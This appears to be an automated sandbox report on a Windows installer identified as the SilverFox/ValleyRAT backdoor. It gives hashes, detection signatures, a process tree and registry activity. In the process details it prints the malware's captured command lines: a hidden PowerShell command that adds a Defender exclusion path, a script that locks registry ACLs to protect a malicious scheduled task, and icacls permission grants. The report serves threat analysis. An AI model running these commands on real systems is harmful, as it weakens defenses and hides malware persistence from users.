File name:

86CB5F74AF900C505A558DD1C9018BC4.exe

Full analysis: https://app.any.run/tasks/1554a9bb-b2fe-40e1-96dc-edba0a76a25c
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices.

Malware Trends Tracker     >>>
Analysis date: July 26, 2025, 00:50:00
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
backdoor
silverfox
valleyrat
winos
rat
qrcode
vmprotect
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 11 sections
MD5:

86CB5F74AF900C505A558DD1C9018BC4

SHA1:

B3398C70A2FC85FC80158C27AB30AC645E3BF4BF

SHA256:

F1BDE45AC4A34B8EC885FB5FB07F5E47F89F97B257CC38A1EB37FC0C308C4A04

SSDEEP:

393216:I3HVEhHibNch9XZPi9J5TieN6m1O41mtbSHNJWFCu:uIXZPlO1mtENJeD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • SILVERFOX has been detected (SURICATA)

      • NtHandleCallback.exe (PID: 7044)
      • tracerpt.exe (PID: 888)

    • VALLEYRAT has been detected

      • NtHandleCallback.exe (PID: 7044)

    • Connects to the CnC server

      • NtHandleCallback.exe (PID: 7044)
      • tracerpt.exe (PID: 888)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7968)
      • powershell.exe (PID: 8044)
      • powershell.exe (PID: 7424)
      • powershell.exe (PID: 7316)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 2668)
      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 4912)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 6312)
      • powershell.exe (PID: 4456)
      • powershell.exe (PID: 2996)
      • powershell.exe (PID: 7876)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 4080)
      • powershell.exe (PID: 2324)
      • powershell.exe (PID: 8080)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 6684)
      • powershell.exe (PID: 8040)
      • powershell.exe (PID: 8472)
      • powershell.exe (PID: 9040)
      • powershell.exe (PID: 8276)
      • powershell.exe (PID: 8372)
      • powershell.exe (PID: 3768)
      • powershell.exe (PID: 9092)
      • powershell.exe (PID: 7848)
      • powershell.exe (PID: 8688)
      • powershell.exe (PID: 8228)
      • powershell.exe (PID: 3840)
      • powershell.exe (PID: 9152)
      • powershell.exe (PID: 5476)
      • powershell.exe (PID: 5928)
      • powershell.exe (PID: 6544)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8528)
      • powershell.exe (PID: 8624)
      • powershell.exe (PID: 6288)
      • powershell.exe (PID: 8592)
      • powershell.exe (PID: 8948)
      • powershell.exe (PID: 6648)
      • powershell.exe (PID: 9160)
      • powershell.exe (PID: 9212)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 7968)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 2668)
      • powershell.exe (PID: 6312)
      • powershell.exe (PID: 4456)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 8276)
      • powershell.exe (PID: 8688)
      • powershell.exe (PID: 9092)
      • powershell.exe (PID: 8228)
      • powershell.exe (PID: 8624)
      • powershell.exe (PID: 8528)
      • powershell.exe (PID: 6288)
      • powershell.exe (PID: 6648)

    • Changes Windows Defender settings

      • NtHandleCallback.exe (PID: 7044)

    • Adds path to the Windows Defender exclusion list

      • NtHandleCallback.exe (PID: 7044)

    • Changes powershell execution policy (Bypass)

      • NtHandleCallback.exe (PID: 7044)

    • VALLEYRAT has been detected (YARA)

      • NtHandleCallback.exe (PID: 7044)

    • WINOS has been detected (YARA)

      • tracerpt.exe (PID: 888)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6264)
      • updater.exe (PID: 6504)

    • Executable content was dropped or overwritten

      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 6720)
      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 4104)
      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • unzip.exe (PID: 3108)
      • updater.exe (PID: 6504)
      • updater.exe (PID: 2508)
      • men.exe (PID: 5628)
      • NtHandleCallback.exe (PID: 7044)
      • NVIDIA.exe (PID: 188)
      • 138.0.7204.169_chrome_installer_uncompressed.exe (PID: 4400)
      • setup.exe (PID: 7852)
      • updater.exe (PID: 7468)
      • updater.exe (PID: 8464)

    • Reads the Windows owner or organization settings

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)

    • Likely accesses (executes) a file from the Public directory

      • setup.exe (PID: 472)
      • unzip.exe (PID: 3108)
      • men.exe (PID: 5628)
      • NtHandleCallback.exe (PID: 7044)
      • NVIDIA.exe (PID: 188)
      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 7968)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 2668)
      • sc.exe (PID: 7936)
      • main.exe (PID: 7864)
      • main.exe (PID: 7872)
      • cmd.exe (PID: 2972)
      • powershell.exe (PID: 6312)
      • powershell.exe (PID: 4456)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 8276)
      • powershell.exe (PID: 9092)
      • powershell.exe (PID: 8688)
      • powershell.exe (PID: 8228)
      • powershell.exe (PID: 8528)
      • powershell.exe (PID: 8624)
      • powershell.exe (PID: 6648)
      • powershell.exe (PID: 6288)

    • Creates file in the systems drive root

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • NtHandleCallback.exe (PID: 7044)

    • Application launched itself

      • updater.exe (PID: 6504)
      • updater.exe (PID: 2508)
      • updater.exe (PID: 6648)
      • setup.exe (PID: 7852)
      • setup.exe (PID: 7600)
      • updater.exe (PID: 7468)
      • updater.exe (PID: 8464)

    • Executes as Windows Service

      • updater.exe (PID: 2508)
      • updater.exe (PID: 6648)
      • updater.exe (PID: 7468)

    • Drops 7-zip archiver for unpacking

      • men.exe (PID: 5628)

    • Drops a system driver (possible attempt to evade defenses)

      • NtHandleCallback.exe (PID: 7044)
      • men.exe (PID: 5628)

    • Connects to unusual port

      • NtHandleCallback.exe (PID: 7044)
      • tracerpt.exe (PID: 888)

    • Contacting a server suspected of hosting an CnC

      • NtHandleCallback.exe (PID: 7044)
      • tracerpt.exe (PID: 888)

    • Query Microsoft Defender preferences

      • NtHandleCallback.exe (PID: 7044)

    • Creates or modifies Windows services

      • NVIDIA.exe (PID: 188)

    • Script adds exclusion path to Windows Defender

      • NtHandleCallback.exe (PID: 7044)

    • Starts POWERSHELL.EXE for commands execution

      • NtHandleCallback.exe (PID: 7044)
      • men.exe (PID: 5628)

    • The process bypasses the loading of PowerShell profile settings

      • NtHandleCallback.exe (PID: 7044)

    • Windows service management via SC.EXE

      • sc.exe (PID: 7848)

    • Creates a new Windows service

      • sc.exe (PID: 7936)

    • Starts SC.EXE for service management

      • men.exe (PID: 5628)

    • Stops a currently running service

      • sc.exe (PID: 7892)

    • Takes ownership (TAKEOWN.EXE)

      • cmd.exe (PID: 7788)

    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 7788)

    • Executing commands from a ".bat" file

      • men.exe (PID: 5628)

    • The process deletes folder without confirmation

      • men.exe (PID: 5628)

    • Starts CMD.EXE for commands execution

      • men.exe (PID: 5628)

    • Hides command output

      • cmd.exe (PID: 7788)

    • There is functionality for taking screenshot (YARA)

      • tracerpt.exe (PID: 888)

  • INFO

    • Create files in a temporary directory

      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 6720)
      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 4104)
      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • setup.exe (PID: 472)
      • updater.exe (PID: 6504)
      • NVIDIA.exe (PID: 188)

    • Checks supported languages

      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 6720)
      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6264)
      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 4104)
      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • setup.exe (PID: 472)
      • unzip.exe (PID: 3108)
      • updater.exe (PID: 6504)
      • men.exe (PID: 5628)
      • updater.exe (PID: 1180)
      • updater.exe (PID: 1160)
      • updater.exe (PID: 2508)
      • NtHandleCallback.exe (PID: 7044)
      • updater.exe (PID: 3740)
      • updater.exe (PID: 6648)
      • NVIDIA.exe (PID: 188)
      • 138.0.7204.169_chrome_installer_uncompressed.exe (PID: 4400)
      • main.exe (PID: 7864)
      • main.exe (PID: 7872)

    • Process checks computer location settings

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6264)

    • Reads the computer name

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6264)
      • 86CB5F74AF900C505A558DD1C9018BC4.exe (PID: 4104)
      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • unzip.exe (PID: 3108)
      • setup.exe (PID: 472)
      • updater.exe (PID: 6504)
      • updater.exe (PID: 2508)
      • men.exe (PID: 5628)
      • updater.exe (PID: 6648)
      • NtHandleCallback.exe (PID: 7044)
      • 138.0.7204.169_chrome_installer_uncompressed.exe (PID: 4400)

    • The sample compiled with english language support

      • 86CB5F74AF900C505A558DD1C9018BC4.tmp (PID: 6704)
      • updater.exe (PID: 2508)
      • updater.exe (PID: 6504)
      • men.exe (PID: 5628)
      • 138.0.7204.169_chrome_installer_uncompressed.exe (PID: 4400)
      • setup.exe (PID: 7852)
      • updater.exe (PID: 7468)
      • updater.exe (PID: 8464)

    • Creates files in the program directory

      • updater.exe (PID: 6504)
      • updater.exe (PID: 1180)
      • updater.exe (PID: 2508)
      • updater.exe (PID: 6648)
      • setup.exe (PID: 7852)
      • setup.exe (PID: 7600)
      • updater.exe (PID: 7468)
      • updater.exe (PID: 8516)
      • updater.exe (PID: 8464)

    • Process checks whether UAC notifications are on

      • updater.exe (PID: 6504)
      • updater.exe (PID: 2508)
      • updater.exe (PID: 6648)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • men.exe (PID: 5628)

    • Reads the software policy settings

      • updater.exe (PID: 6648)
      • updater.exe (PID: 6504)

    • Creates files or folders in the user directory

      • updater.exe (PID: 6504)

    • Checks proxy server information

      • updater.exe (PID: 6504)

    • Reads the machine GUID from the registry

      • updater.exe (PID: 6504)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7424)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 7968)
      • powershell.exe (PID: 8044)
      • powershell.exe (PID: 7316)
      • powershell.exe (PID: 4912)
      • powershell.exe (PID: 2668)
      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 6312)
      • powershell.exe (PID: 2996)
      • powershell.exe (PID: 768)
      • powershell.exe (PID: 7876)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 4456)
      • powershell.exe (PID: 4080)
      • powershell.exe (PID: 2324)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 8040)
      • powershell.exe (PID: 8080)
      • powershell.exe (PID: 6684)
      • powershell.exe (PID: 8276)
      • powershell.exe (PID: 8472)
      • powershell.exe (PID: 9040)
      • powershell.exe (PID: 8688)
      • powershell.exe (PID: 8372)
      • powershell.exe (PID: 3768)
      • powershell.exe (PID: 9092)
      • powershell.exe (PID: 8228)
      • powershell.exe (PID: 3840)
      • powershell.exe (PID: 9152)
      • powershell.exe (PID: 7848)
      • powershell.exe (PID: 5476)
      • powershell.exe (PID: 5928)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8528)
      • powershell.exe (PID: 8624)
      • powershell.exe (PID: 8592)
      • powershell.exe (PID: 6288)
      • powershell.exe (PID: 6544)
      • powershell.exe (PID: 9160)
      • powershell.exe (PID: 8948)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 7748)
      • powershell.exe (PID: 7228)
      • powershell.exe (PID: 7424)
      • powershell.exe (PID: 7968)
      • powershell.exe (PID: 8044)
      • powershell.exe (PID: 7316)
      • powershell.exe (PID: 4912)
      • powershell.exe (PID: 2668)
      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 768)
      • powershell.exe (PID: 7876)
      • powershell.exe (PID: 6312)
      • powershell.exe (PID: 2996)
      • powershell.exe (PID: 4456)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 4080)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 2324)
      • powershell.exe (PID: 8080)
      • powershell.exe (PID: 3396)
      • powershell.exe (PID: 6684)
      • powershell.exe (PID: 8040)
      • powershell.exe (PID: 8276)
      • powershell.exe (PID: 8472)
      • powershell.exe (PID: 9040)
      • powershell.exe (PID: 8688)
      • powershell.exe (PID: 8372)
      • powershell.exe (PID: 3768)
      • powershell.exe (PID: 5476)
      • powershell.exe (PID: 8228)
      • powershell.exe (PID: 3840)
      • powershell.exe (PID: 9152)
      • powershell.exe (PID: 9092)
      • powershell.exe (PID: 7848)
      • powershell.exe (PID: 8624)
      • powershell.exe (PID: 5928)
      • powershell.exe (PID: 5288)
      • powershell.exe (PID: 8528)
      • powershell.exe (PID: 6288)
      • powershell.exe (PID: 8592)
      • powershell.exe (PID: 8948)
      • powershell.exe (PID: 6544)
      • powershell.exe (PID: 9160)

    • The sample compiled with chinese language support

      • NVIDIA.exe (PID: 188)

    • VMProtect protector has been detected

      • men.exe (PID: 5628)

    • Manual execution by a user

      • chrome.exe (PID: 2212)
      • msedge.exe (PID: 3704)
      • msedge.exe (PID: 9096)

    • Application launched itself

      • chrome.exe (PID: 2212)
      • msedge.exe (PID: 3704)

    • Executes as Windows Service

      • elevation_service.exe (PID: 5172)

    • Connects to unusual port

      • chrome.exe (PID: 6876)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Inno Setup installer (67.7)
.exe | Win32 EXE PECompact compressed (generic) (25.6)
.exe | Win32 Executable (generic) (2.7)
.exe | Win16/32 Executable Delphi generic (1.2)
.exe | Generic Win/DOS Executable (1.2)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:10 14:35:33+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 2.25
CodeSize: 704512
InitializedDataSize: 230400
UninitializedDataSize: -
EntryPoint: 0xacfe0
OSVersion: 6.1
ImageVersion: -
SubsystemVersion: 6.1
Subsystem: Windows GUI
FileVersionNumber: 70.0.3538.110
ProductVersionNumber: 70.0.3538.110
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: This installation was built with Inno Setup.
CompanyName:
FileDescription: X Setup
FileVersion: 70.0.3538.110
LegalCopyright:
OriginalFileName:
ProductName: X
ProductVersion: 70.0.3538.110
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
354
Monitored processes
214
Malicious processes
7
Suspicious processes
20

Behavior graph

Click at the process to see the details
start 86cb5f74af900c505a558dd1c9018bc4.exe 86cb5f74af900c505a558dd1c9018bc4.tmp no specs 86cb5f74af900c505a558dd1c9018bc4.exe 86cb5f74af900c505a558dd1c9018bc4.tmp setup.exe no specs unzip.exe conhost.exe no specs updater.exe updater.exe no specs men.exe updater.exe updater.exe no specs updater.exe updater.exe no specs #SILVERFOX nthandlecallback.exe powershell.exe no specs conhost.exe no specs #SILVERFOX tracerpt.exe conhost.exe no specs nvidia.exe svchost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs 138.0.7204.169_chrome_installer_uncompressed.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs setup.exe main.exe no specs main.exe no specs sc.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs takeown.exe no specs setup.exe no specs icacls.exe no specs takeown.exe no specs icacls.exe no specs icacls.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs setup.exe no specs setup.exe no specs chrome.exe chrome.exe no specs slui.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe elevation_service.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs msedge.exe updater.exe updater.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe no specs msedge.exe no specs conhost.exe no specs msedge.exe no specs powershell.exe no specs conhost.exe no specs updatersetup.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs updater.exe powershell.exe no specs updater.exe no specs conhost.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe no specs conhost.exe no specs msedge.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs msedge.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs msedge.exe no specs conhost.exe no specs msedge.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
188C:\Users\Public\Documents\WindowsData\NVIDIA.exeC:\Users\Public\Documents\WindowsData\NVIDIA.exe
NtHandleCallback.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\public\documents\windowsdata\nvidia.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
320"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "if ((Get-MpPreference).ExclusionPath -notcontains 'C:\\Users\\Public\\Documents') { Add-MpPreference -ExclusionPath 'C:\\Users\\Public\\Documents' }"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNtHandleCallback.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
432"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --force-high-res-timeticks=disabled --field-trial-handle=1956,i,13606244526344788668,10843493448230002564,262144 --variations-seed-version --mojo-platform-channel-handle=6824 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
138.0.7204.169
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\138.0.7204.169\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
440\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
472"C:\Users\Public\Documents\setup.exe"C:\Users\Public\Documents\setup.exe86CB5F74AF900C505A558DD1C9018BC4.tmp
User:
admin
Company:
Google LLC
Integrity Level:
HIGH
Description:
Google Installer (x86)
Exit code:
0
Version:
140.0.7272.0
Modules
Images
c:\users\public\documents\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
768powershell -Command "$regPath = 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WindowsPowerShell.WbemScripting.SWbemLocator'; $acl = (Get-Item -Path $regPath).GetAccessControl(); $acl.SetAccessRuleProtection($true,$false); $acl.Access | ForEach-Object { $acl.RemoveAccessRule($_); }; $sidSystem = New-Object System.Security.Principal.SecurityIdentifier('S-1-5-18'); $sidAdmins = New-Object System.Security.Principal.SecurityIdentifier('S-1-5-32-544'); $sidEveryone = New-Object System.Security.Principal.SecurityIdentifier('S-1-1-0'); $acl.AddAccessRule((New-Object System.Security.AccessControl.RegistryAccessRule($sidSystem,'FullControl','Allow'))); $acl.AddAccessRule((New-Object System.Security.AccessControl.RegistryAccessRule($sidAdmins,'ReadKey','Allow'))); $acl.AddAccessRule((New-Object System.Security.AccessControl.RegistryAccessRule($sidEveryone,'Delete','Deny'))); (Get-Item -Path $regPath).SetAccessControl($acl); Disable-ScheduledTask -TaskName 'WindowsPowerShell.WbemScripting.SWbemLocator' >$null; Write-Host '¼Æ»®ÈÎÎñ±£»¤Òѳɹ¦Ó¦ÓÃÇÒ²»¿Éɾ³ý' -ForegroundColor Green;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
868icacls "C:\Windows\System32\Tasks\WindowsPowerShell.WbemScripting.SWbemLocator" /grant Administrators:F C:\Windows\System32\icacls.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\icacls.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
888"C:\Windows\SysWOW64\tracerpt.exe"C:\Windows\SysWOW64\tracerpt.exe
NtHandleCallback.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Event Trace Report Tool
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\tracerpt.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
952\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1096"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=138.0.7204.169 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffc3cc596e8,0x7ffc3cc596f4,0x7ffc3cc59700C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
138.0.7204.169
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
63 182
Read events
63 066
Write events
105
Delete events
11

Modification events

(PID) Process:(6504) updater.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\Clients\{44fc7fe2-65ce-487c-93f4-edee46eeaaab}
Operation:writeName:pv
Value:
140.0.7272.0
(PID) Process:(6504) updater.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\Clients\{44fc7fe2-65ce-487c-93f4-edee46eeaaab}
Operation:writeName:name
Value:
GoogleUpdater
(PID) Process:(6504) updater.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientState\{44fc7fe2-65ce-487c-93f4-edee46eeaaab}
Operation:writeName:pv
Value:
140.0.7272.0
(PID) Process:(6504) updater.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientState\{44fc7fe2-65ce-487c-93f4-edee46eeaaab}
Operation:writeName:name
Value:
GoogleUpdater
(PID) Process:(6504) updater.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20510F28-2A48-5A0C-B29F-D8150AF90AF8}
